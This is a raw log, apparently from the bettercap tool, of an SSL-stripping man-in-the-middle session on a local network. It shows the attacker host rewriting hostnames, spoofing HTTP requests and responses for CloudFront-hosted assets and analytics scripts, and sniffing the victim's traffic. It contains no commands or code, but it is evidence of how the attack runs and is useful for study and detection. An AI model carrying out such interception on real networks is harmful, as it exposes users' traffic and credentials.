 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:11] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:11.968226198 +0200 CEST m=+38.952336314 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.043343388 +0200 CEST m=+39.027453528 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.047076248 +0200 CEST m=+39.031186368 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.017529486 +0200 CEST m=+39.001639615 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 216.58.221.74:80 200 OK -> 12.0.0.5 (2.2 kB text/css; charset=utf-8)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.162616477 +0200 CEST m=+39.146726572 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.174035754 +0200 CEST m=+39.158145876 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.16602629 +0200 CEST m=+39.150136386 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.188340664 +0200 CEST m=+39.172450765 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.226091666 +0200 CEST m=+39.210201788 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.248803942 +0200 CEST m=+39.232914060 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/83b3c2b3542d1ce997306dd2c76a898d/logo-kickstarter.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/42feb2498e08d8fbd357e19d331da908/logo-adobe.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/99b35981e7c571708532ba39f0764aeb/logo-national-geographic.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.304085043 +0200 CEST m=+39.288195120 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.359174232 +0200 CEST m=+39.343284356 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.42718845 +0200 CEST m=+39.411298541 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/759e9aaacc706fd1f2d5f81b1a76b768/logo-fender.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/4838c7256b43105d3abe0631ac1bb72c/logo-google.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-smal...
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small...
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.458186849 +0200 CEST m=+39.442297080 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.572496092 +0200 CEST m=+39.556606211 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:12.577967203 +0200 CEST m=+39.562077329 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.634881536 +0200 CEST m=+39.618991669 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.664830481 +0200 CEST m=+39.648940576 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.745317984 +0200 CEST m=+39.729428076 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/6be2cb0479cad2595799e4975a53a902/patternLibrary.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.829831329 +0200 CEST m=+39.813941473 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.873015905 +0200 CEST m=+39.857126030 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:12.909028232 +0200 CEST m=+39.893138352 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/cb9154106eaefccc2847ad9c47d721ad/tracking.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:12] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.001228168 +0200 CEST m=+39.985338275 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.068645495 +0200 CEST m=+40.052755615 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.133347322 +0200 CEST m=+40.117457450 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.224222286 +0200 CEST m=+40.208332415 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:13.405482002 +0200 CEST m=+40.389592117 { GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35408
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35414
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35406
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.423113254 +0200 CEST m=+40.407223360 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/0cad30a99820b0d840a5b48635d00b6e/updated-layouts-collab.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.436111188 +0200 CEST m=+40.420221290 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/15e77c8347135120a438d17e38195e44/updated-layouts-platform.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.431223166 +0200 CEST m=+40.415333307 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35400
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.464039163 +0200 CEST m=+40.448149244 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/6eaaf5e37ab67a8ed6cd7764660513b9/updated-layouts-sync.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35416
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.467845495 +0200 CEST m=+40.451955625 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/eebf313cb223112b503b7322173b013c/btn-appstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35412
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.49055277 +0200 CEST m=+40.474662886 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/images/bcde9868a665af4ab4efe460c46fbc7b/btn-playstore-black.png 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35418
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.518238665 +0200 CEST m=+40.502348791 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-display/aa4aa85c7ef84dd4cb06bba4cd08a1b6/Charlie_Display-Semibold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35420
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.523968447 +0200 CEST m=+40.508078545 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/42fcf8750a4eb107bc7abd7015b8cc87/Charlie_Text-Light.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35422
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.532404649 +0200 CEST m=+40.516514769 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/b7e8ae700922f44a87cf9bfa816f47f3/Charlie_Text-Regular.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35424
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:13.602790014 +0200 CEST m=+40.586900153 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/fonts/charlie-text/3f276bfa8963485680427956e6020c3b/Charlie_Text-Bold.woff 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:13] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/p/res/images/308998dcb3ed5ab3d01217a4d24ffa03/hero-a.svg
